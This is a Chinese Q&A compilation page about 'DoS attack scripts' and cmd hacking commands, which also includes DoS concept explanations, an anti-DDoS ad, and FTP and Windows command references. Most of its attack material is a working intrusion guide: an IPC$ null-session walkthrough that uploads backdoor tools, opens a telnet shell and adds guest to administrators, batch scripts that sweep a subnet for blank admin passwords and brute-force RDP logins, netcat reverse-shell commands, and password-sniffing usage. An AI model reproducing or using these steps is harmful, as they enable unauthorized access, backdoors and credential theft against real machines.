dos攻擊腳本
『壹』 跪求cmd黑客攻擊指令和cmd電腦命令!懸賞大大滴有
一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟:
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功,連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt;
下面純手打,上面是度娘給的
taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組
『貳』 網站ASP腳本的如何防禦攻擊啊 比如CC,流量,DOS攻擊
天盾防火牆-專業抗DDOS防火牆,完全防禦CC,全連接攻擊,專業級抗DDOS防火牆,徹底防禦SYNFlood,ACKFlood,CC等多種DDOS攻擊!
可以免費試用啊~~
『叄』 什麼是DOS攻擊,DOS攻擊的命令有哪些,攻擊的方式有哪些
DOS,是Denial of Service的簡稱,即拒絕服務,不是DOS操作系統,造成DOS的攻擊行為被稱為DOS攻擊,其目的是使計算機或網路無法提供正常的服務。最常見的DOS攻擊有計算機網路帶寬攻擊和連通性攻擊。
DOS攻擊類型有哪些?常見方式如下:
SYN FLOOD
利用伺服器的連接緩沖區,利用特殊的程序,設置TCP的header,向伺服器端不斷地成倍發送只有SYN標志的TCP連接請求。當伺服器接收的時候,都認為是沒有建立起來的連接請求,於是為這些請求建立會話,排到緩沖區隊列中。
如果SYN請求超過了伺服器能容納的限度,緩沖區隊列滿,那麼伺服器就不再接收新的請求;其他合法用戶的連接都被拒絕,可以持續SYN請求發送,直到緩沖區中都是自己的只有SYN標志的請求。
IP欺騙
DOS攻擊這種攻擊利用RST位來實現的,比如現在有一個合法用戶已經同伺服器建立正常連接,攻擊者構造攻擊的TCP數據,偽裝自己的IP為正常ip,向伺服器發送一個帶有RST位的TCP數據段。伺服器接收到這樣的數據後,認為從合法用戶發送的連接有錯誤,就會清空緩沖區中建立好的連接。這時,如果合法用戶再發送合法數據,伺服器就已經沒有這樣的連接了,該用戶必須重新開始建立連接。
帶寬DOS攻擊
如果連接帶寬足夠大而伺服器又不是很大,可以發送請求,來消耗伺服器的緩沖區消耗伺服器的帶寬。這種攻擊就是人多力量大,配合上SYN一起實施DOS,威力巨大。
自身消耗的DOS攻擊
這種是老式的攻擊手法。說老式,是因為老式的系統有這樣的自身BUG,比如win 95這樣的系統。這種DOS攻擊就是把請求客戶端IP和埠弄成主機的IP埠相同,發送給主機。使得主機給自己發送TCP請求和連接。這種主機的漏洞會很快地把資源消耗光,直接導致宕機。這種偽裝對一些身份認證系統威脅還是很大的。
塞滿伺服器的硬碟
如果伺服器可以沒有限制地執行寫操作,那麼都能成為塞滿硬碟造成DOS攻擊的途徑:
1、發送垃圾郵件:一般公司的伺服器可能把郵件伺服器和Web伺服器都放在一起,破壞者可以發送大量的垃圾郵件,這些郵件可能都塞在一個郵件隊列中或者就是壞郵件隊列中,直到郵箱被撐破或者把硬碟塞滿。
2、讓日誌記錄滿:入侵者可以構造大量的錯誤信息發送出來,伺服器記錄這些錯誤,可能就造成日誌文件非常龐大,甚至會塞滿硬碟。同時會讓管理員痛苦地面對大量的日誌,甚至就不能發現入侵者真正的入侵途徑。
3、向匿名ftp塞垃圾文件,這樣也會塞滿硬碟空間。
『肆』 麻煩各位告訴我一些DOS命令,什麼命令都行啊
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機(同win2K),當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器(同win2K)
附:批處理命令與變數
1:for命令及變數 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變數則用:%%i ,而調用變數時用:%i% ,變數是區分大小寫的(%i 不等於 %I)。
批處理每次能處理的變數從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個或一組文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;"(1 -1 254)"說明:即從254到1 }
command:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開
command_parameters:為特定命令指定參數或命令行開關
IN (set):指在(set)中取值;DO command :指執行command
參數:/L 指用增量形式{ (set)為增量形式時 };/F 指從文件中不斷取值,直到取完為止{ (set)為文件時,如(d:\pass.txt)時 }。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認的 %1;%%G 為變數(ip的最後一位);& 用來隔開echo 和net use 這二個命令;| 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"信息;%1.%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為:ok.exe 說明:輸入一個IP後,用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認)。
#7 七:
2:if命令及變數 基本格式:
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼,指定條件為"真"。
例:IF errorlevel 0 命令 指程序執行後返回的值為0時,就值行後面的命令;IF not errorlevel 1 命令指程序執行最後返回的值不等於1,就執行後面的命令。
0 指發現並成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配(即:字元串1 等於 字元串2),就執行後面的命令。
例:"if "%2%"=="4" goto start"指:如果輸入的第二個變數為4時,執行後面的命令(注意:調用變數時就%變數名%並加" ")
IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執行後面的命令。
例:"if not nc.exe goto end"指:如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命令。注意:else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來,因為del命令要單獨一行時才能執行,用上< >後就等於是單獨一行了;例如:"if exist test.txt. else echo test.txt.missing ",注意命令中的"."
(二)系統外部命令(均需下載相關工具):
1、瑞士軍刀:nc.exe
參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80埠,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註:
| 管道命令
< 或 > 重定向命令。"<",例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt >> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是因為第二次的結果把第一次的覆蓋了。
#8 八:
2、掃錨工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測"hostlist.txt"文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機
#9 九:
3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出
4、終端服務密碼破解: tscrack.exe
參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密碼,並將破解結果保存在rouji.txt文件中。
5、其它:
Shutdown.exe
Shutdown \\IP地址 t:20 20秒後將對方NT自動關閉(Windows 2003系統自帶工具,在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。)
fpipe.exe (TCP埠重定向工具) 在第二篇中有詳細說明(埠重定向繞過防火牆)
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨你的80埠時,他掃到的結果會完全是www.sina.com.cn的主機信息
Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP發送的23埠Telnet請求經埠重定向後,就通過88埠發送到目標IP的23埠。(與目標IP建立Telnet時本機就用的88埠與其相連接)然後:直接Telnet 127.0.0.1(本機IP)就連接到目標IP的23埠了。
OpenTelnet.exe (遠程開啟telnet工具)
opentelnet.exe \\IP 帳號 密碼 ntlm認證方式 Telnet埠 (不需要上傳ntlm.exe破壞微軟的身份驗證方式)直接遠程開啟對方的telnet服務後,就可用telnet \\ip 連接上對方。
NTLM認證方式:0:不使用NTLM身份驗證;1:先嘗試NTLM身份驗證,如果失敗,再使用用戶名和密碼;2:只使用NTLM身份驗證。
ResumeTelnet.exe (OpenTelnet附帶的另一個工具)
resumetelnet.exe \\IP 帳號 密碼 用Telnet連接完對方後,就用這個命令將對方的Telnet設置還原,並同時關閉Telnet服務。
#10 十:
6、FTP命令詳解:
FTP命令是Internet用戶使用最頻繁的命令之一,熟悉並靈活應用FTP的內部命令,可以大大方便使用者,並收到事半功倍之效。如果你想學習使用進行後台FTP下載,那麼就必須學習FTP指令。
FTP的命令行格式為:
ftp -v -d -i -n -g [主機名] ,其中
-v 顯示遠程伺服器的所有響應信息;
-n 限制ftp的自動登錄,即不使用;.n etrc文件;
-d 使用調試方式;
-g 取消全局文件名。
FTP使用的內部命令如下(中括弧表示可選項):
1.![cmd[args]]:在本地機中執行交互shell,exit回到ftp環境,如:!ls*.zip
2.$ macro-ame[args]: 執行宏定義macro-name。
3.account[password]: 提供登錄遠程系統成功後訪問系統資源所需的補充口令。
4.append local-file[remote-file]:將本地文件追加到遠程系統主機,若未指定遠程系統文件名,則使用本地文件名。
5.ascii:使用ascii類型傳輸方式。
6.bell:每個命令執行完畢後計算機響鈴一次。
7.bin:使用二進制文件傳輸方式。
8.bye:退出ftp會話過程。
9.case:在使用mget時,將遠程主機文件名中的大寫轉為小寫字母。
10.cd remote-dir:進入遠程主機目錄。
11.cp:進入遠程主機目錄的父目錄。
12.chmod mode file-name:將遠程主機文件file-name的存取方式設置為mode,如:chmod 777 a.out。
13.close:中斷與遠程伺服器的ftp會話(與open對應)。
14.cr:使用asscii方式傳輸文件時,將回車換行轉換為回行。
15.delete remote-file:刪除遠程主機文件。
16.debug[debug-value]:設置調試方式, 顯示發送至遠程主機的每條命令,如:deb up 3,若設為0,表示取消debug。
17.dir[remote-dir][local-file]:顯示遠程主機目錄,並將結果存入本地文件。
18.disconnection:同close。
19.form format:將文件傳輸方式設置為format,預設為file方式。
20.get remote-file[local-file]: 將遠程主機的文件remote-file傳至本地硬碟的local-file。
21.glob:設置mdelete,mget,mput的文件名擴展,預設時不擴展文件名,同命令行的-g參數。
22.hash:每傳輸1024位元組,顯示一個hash符號(#)。
23.help[cmd]:顯示ftp內部命令cmd的幫助信息,如:help get。
24.idle[seconds]:將遠程伺服器的休眠計時器設為[seconds]秒。
25.image:設置二進制傳輸方式(同binary)。
26.lcd[dir]:將本地工作目錄切換至dir。
27.ls[remote-dir][local-file]:顯示遠程目錄remote-dir, 並存入本地文件local-file。
28.macdef macro-name:定義一個宏,遇到macdef下的空行時,宏定義結束。
29.mdelete[remote-file]:刪除遠程主機文件。
30.mdir remote-files local-file:與dir類似,但可指定多個遠程文件,如 :mdir *.o.*.zipoutfile 。
31.mget remote-files:傳輸多個遠程文件。
32.mkdir dir-name:在遠程主機中建一目錄。
33.mls remote-file local-file:同nlist,但可指定多個文件名。
34.mode[modename]:將文件傳輸方式設置為modename, 預設為stream方式。
35.modtime file-name:顯示遠程主機文件的最後修改時間。
36.mput local-file:將多個文件傳輸至遠程主機。
37.newer file-name: 如果遠程機中file-name的修改時間比本地硬碟同名文件的時間更近,則重傳該文件。
38.nlist[remote-dir][local-file]:顯示遠程主機目錄的文件清單,並存入本地硬碟的local-file。
39.nmap[inpattern outpattern]:設置文件名映射機制, 使得文件傳輸時,文件中的某些字元相互轉換, 如:nmap $1.$2.$3[$1,$2].[$2,$3],則傳輸文件a1.a2.a3時,文件名變為a1,a2。 該命令特別適用於遠程主機為非UNIX機的情況。
40.ntrans[inchars[outchars]]:設置文件名字元的翻譯機制,如ntrans1R,則文件名LLL將變為RRR。
41.open host[port]:建立指定ftp伺服器連接,可指定連接埠。
42.passive:進入被動傳輸方式。
43.prompt:設置多個文件傳輸時的交互提示。
44.proxy ftp-cmd:在次要控制連接中,執行一條ftp命令, 該命令允許連接兩個ftp伺服器,以在兩個伺服器間傳輸文件。第一條ftp命令必須為open,以首先建立兩個伺服器間的連接。
45.put local-file[remote-file]:將本地文件local-file傳送至遠程主機。
46.pwd:顯示遠程主機的當前工作目錄。
47.quit:同bye,退出ftp會話。
48.quote arg1,arg2...:將參數逐字發至遠程ftp伺服器,如:quote syst.
49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:類似於get, 但若local-file存在,則從上次傳輸中斷處續傳。
51.rhelp[cmd-name]:請求獲得遠程主機的幫助。
52.rstatus[file-name]:若未指定文件名,則顯示遠程主機的狀態, 否則顯示文件狀態。
53.rename[from][to]:更改遠程主機文件名。
54.reset:清除回答隊列。
55.restart marker:從指定的標志marker處,重新開始get或put,如:restart 130。
56.rmdir dir-name:刪除遠程主機目錄。
57.runique:設置文件名只一性存儲,若文件存在,則在原文件後加後綴.1, .2等。
58.send local-file[remote-file]:同put。
59.sendport:設置PORT命令的使用。
60.site arg1,arg2...:將參數作為SITE命令逐字發送至遠程ftp主機。
61.size file-name:顯示遠程主機文件大小,如:site idle 7200。
62.status:顯示當前ftp狀態。
63.struct[struct-name]:將文件傳輸結構設置為struct-name, 預設時使用stream結構。
64.sunique:將遠程主機文件名存儲設置為只一(與runique對應)。
65.system:顯示遠程主機的操作系統類型。
66.tenex:將文件傳輸類型設置為TENEX機的所需的類型。
67.tick:設置傳輸時的位元組計數器。
68.trace:設置包跟蹤。
69.type[type-name]:設置文件傳輸類型為type-name,預設為ascii,如:type binary,設置二進制傳輸方式。
70.umask[newmask]:將遠程伺服器的預設umask設置為newmask,如:umask 3
71.user user-name[password][account]:向遠程主機表明自己的身份,需要口令時,必須輸入口令,如:user anonymous my@email。
72.verbose:同命令行的-v參數,即設置詳盡報告方式,ftp 伺服器的所有響 應都將顯示給用戶,預設為on.
73.?[cmd]:同help.
#11 十一:
7:計算機運行命令全集 winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板winmsd-----系統信息
wiaacmgr-------掃描儀和照相機向導
winchat--------XP自帶區域網聊天
mem.exe--------顯示內存使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制台
mobsync--------同步命令
dxdiag---------檢查DirectX信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁碟碎片整理程序
diskmgmt.msc---磁碟管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網路管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)命令檢查介面
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音量控製程序
sfc.exe--------系統文件檢查器
sfc /scannow---windows文件保護
tsshutdn-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr--------任務管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器
packager-------對象包裝程序
perfmon.msc----計算機性能監測程序
progman--------程序管理器
regedit.exe----注冊表
rsop.msc-------組策略結果集
regedt32-------注冊表編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll文件運行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁碟檢查
certmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字元映射表
cliconfg-------SQL SERVER 客戶端網路實用程序
Clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---計算機管理
cleanmgr-------**整理
ciadv.msc------索引服務程序
osk------------打開屏幕鍵盤
odbcad32-------ODBC數據源管理器
oobe/msoobe /a----檢查XP是否激活
lusrmgr.msc----本機用戶和組
logoff---------注銷命令
iexpress-------木馬捆綁工具,系統自帶
Nslookup-------IP地址偵測器
fsmgmt.msc-----共享文件夾管理器
utilman--------輔助工具管理器
gpedit.msc-----組策略
『伍』 DDOS攻擊包括哪些
1、TCP洪水攻擊(SYN Flood)
TCP洪水攻擊是當前最流行的DoS(拒絕服務攻擊)與DDoS(分布式拒絕服務攻擊)的方式之一,這是一種利用TCP協議缺陷;
發送大量偽造的TCP連接請求,常用假冒的IP或IP號段發來海量的請求連接的第一個握手包(SYN包),被攻擊伺服器回應第二個握手包(SYN+ACK包),因為對方是假冒IP,對方永遠收不到包且不會回應第三個握手包。
導致被攻擊伺服器保持大量SYN_RECV狀態的「半連接」,並且會重試默認5次回應第二個握手包,塞滿TCP等待連接隊列,資源耗盡(CPU滿負荷或內存不足),讓正常的業務請求連接不進來。
2、反射性攻擊(DrDoS)
反射型的 DDoS 攻擊是一種新的變種,與DoS、DDoS不同,該方式靠的是發送大量帶有被害者IP地址的數據包給攻擊主機,然後攻擊主機對IP地址源做出大量回應,形成拒絕服務攻擊。
黑客往往會選擇那些響應包遠大於請求包的服務來利用,這樣才可以以較小的流量換取更大的流量,獲得幾倍甚至幾十倍的放大效果,從而四兩撥千斤。一般來說,可以被利用來做放大反射攻擊的服務包括DNS服務、NTP服務、SSDP服務、Chargen服務、Memcached等。
3、CC攻擊(HTTP Flood)
HTTP Flood又稱CC攻擊,是針對Web服務在第七層協議發起的攻擊。通過向Web伺服器發送大量HTTP請求來模仿網站訪問者以耗盡其資源。雖然其中一些攻擊具有可用於識別和阻止它們的模式,但是無法輕易識別的HTTP洪水。它的巨大危害性主要表現在三個方面:發起方便、過濾困難、影響深遠。
4、直接僵屍網路攻擊
僵屍網路就是我們俗稱的「肉雞」,現在「肉雞」不再局限於傳統PC,越來越多的智能物聯網設備進入市場,且安全性遠低於PC,這讓攻擊者更容易獲得大量「肉雞」;
也更容易直接發起僵屍網路攻擊。根據僵屍網路的不同類型,攻擊者可以使用它來執行各種不同的攻擊,不僅僅是網站,還包括游戲伺服器和任何其他服務。
5、DOS攻擊利用一些伺服器程序的bug、安全漏洞、和架構性缺陷攻擊
然後通過構造畸形請求發送給伺服器,伺服器因不能判斷處理惡意請求而癱瘓,造成拒絕服務。以上就是墨者安全認為現階段出現過的DDOS攻擊種類,當然也有可能不是那麼全面,DDOS攻擊的種類復雜而且也不斷的在衍變,目前的防禦也是隨著攻擊方式再增強。
『陸』 kail 如何編寫dos攻擊腳本
在計算機行業,拒絕服務(DoS)或分布式拒絕服務(DDoS)攻擊是指不法分子企圖讓某機器或網路資源無法被預期的用戶所使用。雖然執行DoS攻擊的方式、動機和目標不一樣,但通常包括設法臨時性或無限期中斷或暫停連接至互聯網的主機提供服務。
攻擊過程:
1.你使用hping3執行拒絕服務攻擊(即DoS)。
2.你隱藏你的a$$(我是指你的源頭IP地址)。
3.你的目標機器看到的將是隨機性源頭IP地址中的源頭,而不是你的IP地址(IP偽裝)。
